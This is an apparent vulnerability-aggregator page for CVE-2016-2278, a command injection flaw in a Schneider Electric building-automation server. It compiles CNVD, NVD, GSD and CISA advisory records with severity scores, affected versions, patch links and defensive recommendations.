Schneider Electric StruxureWare Building Operation Application Server是法国施耐德电气（Schneider Electric）公司的一套用于中小型建筑楼宇的自动化系统。 Schneider Electric StruxureWare Building Operation Application Server 1.7及之前版本中存在操作系统命令注入漏洞。远程攻击者可利用该漏洞绕过访问控制，执行任意OS命令。

Severity

中

Patch Name

Schneider Electric Building Operation Application Server操作系统命令注入漏洞的补丁

Patch Description

Formal description

目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接： http://download.schneider-electric.com/files?p_Reference=SEVD-2016-025-01&p_EnDocType=Technical%20leaflet&p_File_Id=1768002595&p_File_Name=SEVD-2016-025-01+SBO+AS.pdf

Reference

https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-2278

Impacted products

Name
Schneider Electric StruxureWare Building Operation Application Server <=1.7

Show details on source website

JSON

To clipboard

{
  "cves": {
    "cve": {
      "cveNumber": "CVE-2016-2278"
    }
  },
  "description": "Schneider Electric StruxureWare Building Operation Application Server\u662f\u6cd5\u56fd\u65bd\u8010\u5fb7\u7535\u6c14\uff08Schneider Electric\uff09\u516c\u53f8\u7684\u4e00\u5957\u7528\u4e8e\u4e2d\u5c0f\u578b\u5efa\u7b51\u697c\u5b87\u7684\u81ea\u52a8\u5316\u7cfb\u7edf\u3002\r\n\r\nSchneider Electric StruxureWare Building Operation Application Server 1.7\u53ca\u4e4b\u524d\u7248\u672c\u4e2d\u5b58\u5728\u64cd\u4f5c\u7cfb\u7edf\u547d\u4ee4\u6ce8\u5165\u6f0f\u6d1e\u3002\u8fdc\u7a0b\u653b\u51fb\u8005\u53ef\u5229\u7528\u8be5\u6f0f\u6d1e\u7ed5\u8fc7\u8bbf\u95ee\u63a7\u5236\uff0c\u6267\u884c\u4efb\u610fOS\u547d\u4ee4\u3002",
  "discovererName": "unknown",
  "formalWay": "\u76ee\u524d\u5382\u5546\u5df2\u7ecf\u53d1\u5e03\u4e86\u5347\u7ea7\u8865\u4e01\u4ee5\u4fee\u590d\u6b64\u5b89\u5168\u95ee\u9898\uff0c\u8865\u4e01\u83b7\u53d6\u94fe\u63a5\uff1a\r\nhttp://download.schneider-electric.com/files?p_Reference=SEVD-2016-025-01\u0026p_EnDocType=Technical%20leaflet\u0026p_File_Id=1768002595\u0026p_File_Name=SEVD-2016-025-01+SBO+AS.pdf",
  "isEvent": "\u901a\u7528\u8f6f\u786c\u4ef6\u6f0f\u6d1e",
  "number": "CNVD-2016-01450",
  "openTime": "2016-03-04",
  "patchDescription": "Schneider Electric StruxureWare Building Operation Application Server\u662f\u6cd5\u56fd\u65bd\u8010\u5fb7\u7535\u6c14\uff08Schneider Electric\uff09\u516c\u53f8\u7684\u4e00\u5957\u7528\u4e8e\u4e2d\u5c0f\u578b\u5efa\u7b51\u697c\u5b87\u7684\u81ea\u52a8\u5316\u7cfb\u7edf\u3002\r\n\r\nSchneider Electric StruxureWare Building Operation Application Server 1.7\u53ca\u4e4b\u524d\u7248\u672c\u4e2d\u5b58\u5728\u64cd\u4f5c\u7cfb\u7edf\u547d\u4ee4\u6ce8\u5165\u6f0f\u6d1e\u3002\u8fdc\u7a0b\u653b\u51fb\u8005\u53ef\u5229\u7528\u8be5\u6f0f\u6d1e\u7ed5\u8fc7\u8bbf\u95ee\u63a7\u5236\uff0c\u6267\u884c\u4efb\u610fOS\u547d\u4ee4\u3002\u76ee\u524d\uff0c\u4f9b\u5e94\u5546\u53d1\u5e03\u4e86\u5b89\u5168\u516c\u544a\u53ca\u76f8\u5173\u8865\u4e01\u4fe1\u606f\uff0c\u4fee\u590d\u4e86\u6b64\u6f0f\u6d1e\u3002",
  "patchName": "Schneider Electric Building Operation Application Server\u64cd\u4f5c\u7cfb\u7edf\u547d\u4ee4\u6ce8\u5165\u6f0f\u6d1e\u7684\u8865\u4e01",
  "products": {
    "product": "Schneider Electric StruxureWare Building Operation Application Server  \u003c=1.7"
  },
  "referenceLink": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-2278",
  "serverity": "\u4e2d",
  "submitTime": "2016-03-03",
  "title": "Schneider Electric Building Operation Application Server\u64cd\u4f5c\u7cfb\u7edf\u547d\u4ee4\u6ce8\u5165\u6f0f\u6d1e"
}

fkie_cve-2016-2278

Vulnerability from fkie_nvd

Published

2016-03-02 11:59

Modified

2025-04-12 10:46

Severity ?

7.2 (High) - CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Summary

References

URL	Tags
ics-cert@hq.dhs.gov	http://download.schneider-electric.com/files?p_Doc_Ref=SEVD-2016-025-01	Vendor Advisory
ics-cert@hq.dhs.gov	https://ics-cert.us-cert.gov/advisories/ICSA-16-061-01	Third Party Advisory, US Government Resource
ics-cert@hq.dhs.gov	https://www.exploit-db.com/exploits/39522/	Third Party Advisory, VDB Entry
af854a3a-2127-422b-91ae-364da2661108	http://download.schneider-electric.com/files?p_Doc_Ref=SEVD-2016-025-01	Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	https://ics-cert.us-cert.gov/advisories/ICSA-16-061-01	Third Party Advisory, US Government Resource
af854a3a-2127-422b-91ae-364da2661108	https://www.exploit-db.com/exploits/39522/	Third Party Advisory, VDB Entry

Impacted products

Vendor	Product	Version
schneider-electric	struxureware_building_operations_automation_server_as	*
schneider-electric	struxureware_building_operations_automation_server_as_firmware	*
schneider-electric	struxureware_building_operations_automation_server_as-p	-
schneider-electric	struxureware_building_operations_automation_server_as-p_firmware	1.7

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:h:schneider-electric:struxureware_building_operations_automation_server_as:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "110EEA8A-55D1-414E-A7DB-C334A684A151",
              "versionEndIncluding": "1.7",
              "vulnerable": false
            }
          ],
          "negate": false,
          "operator": "OR"
        },
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:o:schneider-electric:struxureware_building_operations_automation_server_as_firmware:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "8E429698-E867-4AE8-91D7-B448953B3812",
              "versionEndIncluding": "1.7",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ],
      "operator": "AND"
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:h:schneider-electric:struxureware_building_operations_automation_server_as-p:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "68F5B9A7-54D0-4B81-8CC0-22E1696F5AC2",
              "vulnerable": false
            }
          ],
          "negate": false,
          "operator": "OR"
        },
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:o:schneider-electric:struxureware_building_operations_automation_server_as-p_firmware:1.7:*:*:*:*:*:*:*",
              "matchCriteriaId": "EF195758-62DE-454C-997C-E5BEA6BBE0EB",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ],
      "operator": "AND"
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Schneider Electric Struxureware Building Operations Automation Server AS 1.7 and earlier and AS-P 1.7 and earlier allows remote authenticated administrators to execute arbitrary OS commands by defeating an msh (aka Minimal Shell) protection mechanism."
    },
    {
      "lang": "es",
      "value": "Schneider Electric Struxureware Building Operations Automation Server AS 1.7 y versiones anteriores y AS-P 1.7 y versiones anteriores permite a administradores remotos autenticados ejecutar comandos de SO arbitrarios venciendo un mecanismo de protecci\u00f3n msh (tambi\u00e9n conocido como Minimal Shell)."
    }
  ],
  "id": "CVE-2016-2278",
  "lastModified": "2025-04-12T10:46:40.837",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "HIGH",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "SINGLE",
          "availabilityImpact": "COMPLETE",
          "baseScore": 9.0,
          "confidentialityImpact": "COMPLETE",
          "integrityImpact": "COMPLETE",
          "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
          "version": "2.0"
        },
        "exploitabilityScore": 8.0,
        "impactScore": 10.0,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ],
    "cvssMetricV30": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 7.2,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "HIGH",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
          "version": "3.0"
        },
        "exploitabilityScore": 1.2,
        "impactScore": 5.9,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ]
  },
  "published": "2016-03-02T11:59:02.600",
  "references": [
    {
      "source": "ics-cert@hq.dhs.gov",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://download.schneider-electric.com/files?p_Doc_Ref=SEVD-2016-025-01"
    },
    {
      "source": "ics-cert@hq.dhs.gov",
      "tags": [
        "Third Party Advisory",
        "US Government Resource"
      ],
      "url": "https://ics-cert.us-cert.gov/advisories/ICSA-16-061-01"
    },
    {
      "source": "ics-cert@hq.dhs.gov",
      "tags": [
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "https://www.exploit-db.com/exploits/39522/"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://download.schneider-electric.com/files?p_Doc_Ref=SEVD-2016-025-01"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Third Party Advisory",
        "US Government Resource"
      ],
      "url": "https://ics-cert.us-cert.gov/advisories/ICSA-16-061-01"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "https://www.exploit-db.com/exploits/39522/"
    }
  ],
  "sourceIdentifier": "ics-cert@hq.dhs.gov",
  "vulnStatus": "Deferred",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-284"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

gsd-2016-2278

Vulnerability from gsd

Modified

2023-12-13 01:21

Details

Aliases

CVE-2016-2278

Aliases

CVE-2016-2278

JSON

To clipboard

{
  "GSD": {
    "alias": "CVE-2016-2278",
    "description": "Schneider Electric Struxureware Building Operations Automation Server AS 1.7 and earlier and AS-P 1.7 and earlier allows remote authenticated administrators to execute arbitrary OS commands by defeating an msh (aka Minimal Shell) protection mechanism.",
    "id": "GSD-2016-2278"
  },
  "gsd": {
    "metadata": {
      "exploitCode": "unknown",
      "remediation": "unknown",
      "reportConfidence": "confirmed",
      "type": "vulnerability"
    },
    "osvSchema": {
      "aliases": [
        "CVE-2016-2278"
      ],
      "details": "Schneider Electric Struxureware Building Operations Automation Server AS 1.7 and earlier and AS-P 1.7 and earlier allows remote authenticated administrators to execute arbitrary OS commands by defeating an msh (aka Minimal Shell) protection mechanism.",
      "id": "GSD-2016-2278",
      "modified": "2023-12-13T01:21:19.482005Z",
      "schema_version": "1.4.0"
    }
  },
  "namespaces": {
    "cve.org": {
      "CVE_data_meta": {
        "ASSIGNER": "ics-cert@hq.dhs.gov",
        "ID": "CVE-2016-2278",
        "STATE": "PUBLIC"
      },
      "affects": {
        "vendor": {
          "vendor_data": [
            {
              "product": {
                "product_data": [
                  {
                    "product_name": "n/a",
                    "version": {
                      "version_data": [
                        {
                          "version_value": "n/a"
                        }
                      ]
                    }
                  }
                ]
              },
              "vendor_name": "n/a"
            }
          ]
        }
      },
      "data_format": "MITRE",
      "data_type": "CVE",
      "data_version": "4.0",
      "description": {
        "description_data": [
          {
            "lang": "eng",
            "value": "Schneider Electric Struxureware Building Operations Automation Server AS 1.7 and earlier and AS-P 1.7 and earlier allows remote authenticated administrators to execute arbitrary OS commands by defeating an msh (aka Minimal Shell) protection mechanism."
          }
        ]
      },
      "problemtype": {
        "problemtype_data": [
          {
            "description": [
              {
                "lang": "eng",
                "value": "n/a"
              }
            ]
          }
        ]
      },
      "references": {
        "reference_data": [
          {
            "name": "http://download.schneider-electric.com/files?p_Doc_Ref=SEVD-2016-025-01",
            "refsource": "CONFIRM",
            "url": "http://download.schneider-electric.com/files?p_Doc_Ref=SEVD-2016-025-01"
          },
          {
            "name": "https://ics-cert.us-cert.gov/advisories/ICSA-16-061-01",
            "refsource": "MISC",
            "url": "https://ics-cert.us-cert.gov/advisories/ICSA-16-061-01"
          },
          {
            "name": "39522",
            "refsource": "EXPLOIT-DB",
            "url": "https://www.exploit-db.com/exploits/39522/"
          }
        ]
      }
    },
    "nvd.nist.gov": {
      "configurations": {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:schneider-electric:struxureware_building_operations_automation_server_as:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "1.7",
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:schneider-electric:struxureware_building_operations_automation_server_as_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "1.7",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:schneider-electric:struxureware_building_operations_automation_server_as-p:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:schneider-electric:struxureware_building_operations_automation_server_as-p_firmware:1.7:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          }
        ]
      },
      "cve": {
        "CVE_data_meta": {
          "ASSIGNER": "ics-cert@hq.dhs.gov",
          "ID": "CVE-2016-2278"
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "en",
              "value": "Schneider Electric Struxureware Building Operations Automation Server AS 1.7 and earlier and AS-P 1.7 and earlier allows remote authenticated administrators to execute arbitrary OS commands by defeating an msh (aka Minimal Shell) protection mechanism."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "en",
                  "value": "CWE-284"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "http://download.schneider-electric.com/files?p_Doc_Ref=SEVD-2016-025-01",
              "refsource": "CONFIRM",
              "tags": [
                "Vendor Advisory"
              ],
              "url": "http://download.schneider-electric.com/files?p_Doc_Ref=SEVD-2016-025-01"
            },
            {
              "name": "https://ics-cert.us-cert.gov/advisories/ICSA-16-061-01",
              "refsource": "MISC",
              "tags": [
                "Third Party Advisory",
                "US Government Resource"
              ],
              "url": "https://ics-cert.us-cert.gov/advisories/ICSA-16-061-01"
            },
            {
              "name": "39522",
              "refsource": "EXPLOIT-DB",
              "tags": [
                "Third Party Advisory",
                "VDB Entry"
              ],
              "url": "https://www.exploit-db.com/exploits/39522/"
            }
          ]
        }
      },
      "impact": {
        "baseMetricV2": {
          "cvssV2": {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "SINGLE",
            "availabilityImpact": "COMPLETE",
            "baseScore": 9.0,
            "confidentialityImpact": "COMPLETE",
            "integrityImpact": "COMPLETE",
            "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
            "version": "2.0"
          },
          "exploitabilityScore": 8.0,
          "impactScore": 10.0,
          "obtainAllPrivilege": false,
          "obtainOtherPrivilege": false,
          "obtainUserPrivilege": false,
          "severity": "HIGH",
          "userInteractionRequired": false
        },
        "baseMetricV3": {
          "cvssV3": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 7.2,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "HIGH",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.0"
          },
          "exploitabilityScore": 1.2,
          "impactScore": 5.9
        }
      },
      "lastModifiedDate": "2018-10-30T16:28Z",
      "publishedDate": "2016-03-02T11:59Z"
    }
  }
}

icsa-16-061-01

Vulnerability from csaf_cisa

Published

2016-12-03 07:00

Modified

2025-06-05 21:37

Summary

Schneider Electric Building Operation Automation Server Vulnerability

Notes

Legal Notice

All information products included in https://us-cert.cisa.gov/ics are provided "as is" for informational purposes only. The Department of Homeland Security (DHS) does not provide any warranties of any kind regarding any information contained within. DHS does not endorse any commercial product or service, referenced in this product or otherwise. Further dissemination of this product is governed by the Traffic Light Protocol (TLP) marking in the header. For more information about TLP, see https://us-cert.cisa.gov/tlp/.

CISA Disclaimer

This CSAF advisory was extracted from unstructured data and may contain inaccuracies. If you notice any errors, please reach out to the designated contact at CISA CSAF: central@cisa.dhs.gov

Recommended Practices

CISA recommends users take defensive measures to minimize the risk of exploitation.

Recommended Practices

Minimize network exposure for all control system devices and/or systems, ensuring they are not accessible from the internet.

Recommended Practices

Locate control system networks and remote devices behind firewalls and isolating them from business networks.

Recommended Practices

When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs). Recognize VPNs may have vulnerabilities, should be updated to the most recent version available, and are only as secure as the connected devices.

Recommended Practices

CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.

Recommended Practices

CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies.

Recommended Practices

CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets.

Recommended Practices

Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies.

Recommended Practices

Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents.

Recommended Practices

CISA also recommends users take the following measures to protect themselves from social engineering attacks: Do not click web links or open attachments in unsolicited email messages. Refer to Recognizing and Avoiding Email Scams for more information on avoiding email scams. Refer to Avoiding Social Engineering and Phishing Attacks for more information on social engineering attacks.

JSON

To clipboard

{
  "document": {
    "category": "csaf_security_advisory",
    "csaf_version": "2.0",
    "distribution": {
      "text": "Disclosure is not limited",
      "tlp": {
        "label": "WHITE",
        "url": "https://us-cert.cisa.gov/tlp/"
      }
    },
    "lang": "en-US",
    "notes": [
      {
        "category": "legal_disclaimer",
        "text": "All information products included in https://us-cert.cisa.gov/ics are provided \"as is\" for informational purposes only. The Department of Homeland Security (DHS) does not provide any warranties of any kind regarding any information contained within. DHS does not endorse any commercial product or service, referenced in this product or otherwise. Further dissemination of this product is governed by the Traffic Light Protocol (TLP) marking in the header. For more information about TLP, see https://us-cert.cisa.gov/tlp/.",
        "title": "Legal Notice"
      },
      {
        "category": "general",
        "text": "This CSAF advisory was extracted from unstructured data and may contain inaccuracies. If you notice any errors, please reach out to the designated contact at CISA CSAF: central@cisa.dhs.gov",
        "title": "CISA Disclaimer"
      },
      {
        "category": "general",
        "text": "CISA recommends users take defensive measures to minimize the risk of exploitation.",
        "title": "Recommended Practices"
      },
      {
        "category": "general",
        "text": "Minimize network exposure for all control system devices and/or systems, ensuring they are not accessible from the internet.",
        "title": "Recommended Practices"
      },
      {
        "category": "general",
        "text": "Locate control system networks and remote devices behind firewalls and isolating them from business networks.",
        "title": "Recommended Practices"
      },
      {
        "category": "general",
        "text": "When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs). Recognize VPNs may have vulnerabilities, should be updated to the most recent version available, and are only as secure as the connected devices.",
        "title": "Recommended Practices"
      },
      {
        "category": "general",
        "text": "CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.",
        "title": "Recommended Practices"
      },
      {
        "category": "general",
        "text": "CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies.",
        "title": "Recommended Practices"
      },
      {
        "category": "general",
        "text": "CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets.",
        "title": "Recommended Practices"
      },
      {
        "category": "general",
        "text": "Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies.",
        "title": "Recommended Practices"
      },
      {
        "category": "general",
        "text": "Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents.",
        "title": "Recommended Practices"
      },
      {
        "category": "general",
        "text": "CISA also recommends users take the following measures to protect themselves from social engineering attacks: Do not click web links or open attachments in unsolicited email messages. Refer to Recognizing and Avoiding Email Scams for more information on avoiding email scams. Refer to Avoiding Social Engineering and Phishing Attacks for more information on social engineering attacks.",
        "title": "Recommended Practices"
      }
    ],
    "publisher": {
      "category": "coordinator",
      "contact_details": "central@cisa.dhs.gov",
      "name": "CISA",
      "namespace": "https://www.cisa.gov/"
    },
    "references": [
      {
        "category": "self",
        "summary": "ICS Advisory ICSA-16-061-01 JSON",
        "url": "https://raw.githubusercontent.com/cisagov/CSAF/develop/csaf_files/OT/white/2016/icsa-16-061-01.json"
      },
      {
        "category": "self",
        "summary": "ICS Advisory ICSA-16-061-01 - Web Version",
        "url": "https://www.cisa.gov/news-events/ics-advisories/icsa-16-061-01"
      },
      {
        "category": "external",
        "summary": "Recommended Practices",
        "url": "https://www.cisa.gov/uscert/ics/alerts/ICS-ALERT-10-301-01"
      },
      {
        "category": "external",
        "summary": "Recommended Practices",
        "url": "https://www.cisa.gov/resources-tools/resources/ics-recommended-practices"
      },
      {
        "category": "external",
        "summary": "Recommended Practices",
        "url": "https://www.cisa.gov/topics/industrial-control-systems"
      },
      {
        "category": "external",
        "summary": "Recommended Practices",
        "url": "https://us-cert.cisa.gov/sites/default/files/recommended_practices/NCCIC_ICS-CERT_Defense_in_Depth_2016_S508C.pdf"
      },
      {
        "category": "external",
        "summary": "Recommended Practices",
        "url": "https://www.cisa.gov/sites/default/files/publications/Cybersecurity_Best_Practices_for_Industrial_Control_Systems.pdf"
      },
      {
        "category": "external",
        "summary": "Recommended Practices",
        "url": "https://www.cisa.gov/uscert/ics/tips/ICS-TIP-12-146-01B"
      },
      {
        "category": "external",
        "summary": "Recommended Practices",
        "url": "https://www.cisa.gov/uscert/sites/default/files/publications/emailscams0905.pdf"
      },
      {
        "category": "external",
        "summary": "Recommended Practices",
        "url": "https://www.cisa.gov/uscert/ncas/tips/ST04-014"
      }
    ],
    "title": "Schneider Electric Building Operation Automation Server Vulnerability",
    "tracking": {
      "current_release_date": "2025-06-05T21:37:39.217752Z",
      "generator": {
        "date": "2025-06-05T21:37:39.217703Z",
        "engine": {
          "name": "CISA CSAF Generator",
          "version": "1.0.0"
        }
      },
      "id": "ICSA-16-061-01",
      "initial_release_date": "2016-12-03T07:00:00.000000Z",
      "revision_history": [
        {
          "date": "2016-12-03T07:00:00.000000Z",
          "legacy_version": "Initial",
          "number": "1",
          "summary": "Initial Publication"
        },
        {
          "date": "2025-06-05T21:37:39.217752Z",
          "legacy_version": "CSAF Conversion",
          "number": "2",
          "summary": "Advisory converted into a CSAF"
        }
      ],
      "status": "final",
      "version": "2"
    }
  },
  "product_tree": {
    "branches": [
      {
        "branches": [
          {
            "branches": [
              {
                "category": "product_version_range",
                "name": "\u003c=V1.7.0",
                "product": {
                  "name": "Schneider Electric Automation Server: \u003c=V1.7.0",
                  "product_id": "CSAFPID-0001"
                }
              }
            ],
            "category": "product_name",
            "name": "Automation Server"
          }
        ],
        "category": "vendor",
        "name": "Schneider Electric"
      }
    ]
  },
  "vulnerabilities": [
    {
      "cve": "CVE-2016-2278",
      "cwe": {
        "id": "CWE-78",
        "name": "Improper Neutralization of Special Elements used in an OS Command (\u0027OS Command Injection\u0027)"
      },
      "notes": [
        {
          "category": "summary",
          "text": "Schneider Electric Struxureware Building Operations Automation Server AS 1.7 and earlier and AS-P 1.7 and earlier allows remote authenticated administrators to execute arbitrary OS commands by defeating an msh (aka Minimal Shell) protection mechanism.",
          "title": "Vulnerability Summary"
        }
      ],
      "product_status": {
        "known_affected": [
          "CSAFPID-0001"
        ]
      },
      "remediations": [
        {
          "category": "mitigation",
          "details": "Schneider Electric has released a new version of Automation Server firmware which remediates this vulnerability. The user is no longer allowed to operate the system with default credentials and the minimal \u201cmsh\u201d shell can no longer be circumvented. Users should contact their authorized Schneider Electric service channel to access the firmware update.",
          "product_ids": [
            "CSAFPID-0001"
          ]
        },
        {
          "category": "mitigation",
          "details": "For more information, please see Schneider Electric\u2019s Security Notification number SEVD-2016-025-01 at the following location on their web site: (http://www.schneider-electric.com/ww/en/download/document/SEVD-2016-025-01)",
          "product_ids": [
            "CSAFPID-0001"
          ],
          "url": "http://www.schneider-electric.com/ww/en/download/document/SEVD-2016-025-01"
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "baseScore": 7.2,
            "baseSeverity": "HIGH",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.0"
          },
          "products": [
            "CSAFPID-0001"
          ]
        }
      ]
    }
  ]
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
Confirmed: The vulnerability is confirmed from an analyst perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
Patched: This vulnerability was successfully patched by the user reporting the sighting.
Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
Not confirmed: The user expresses doubt about the veracity of the vulnerability.
Not patched: This vulnerability was not successfully patched by the user reporting the sighting.

Action not permitted

CVE-2016-2278 (GCVE-0-2016-2278)

Vulnerability from cvelistv5

var-201603-0043

Vulnerability from variot

1) Respect the privacy of others.

2) Think before you type.

3) With great power comes great responsibility.

+++++

ghsa-5242-5wvm-8m3p

Vulnerability from github

cnvd-2016-01450

Vulnerability from cnvd

fkie_cve-2016-2278

Vulnerability from fkie_nvd

gsd-2016-2278

Vulnerability from gsd

icsa-16-061-01

Vulnerability from csaf_cisa

Tags

Sightings

Nomenclature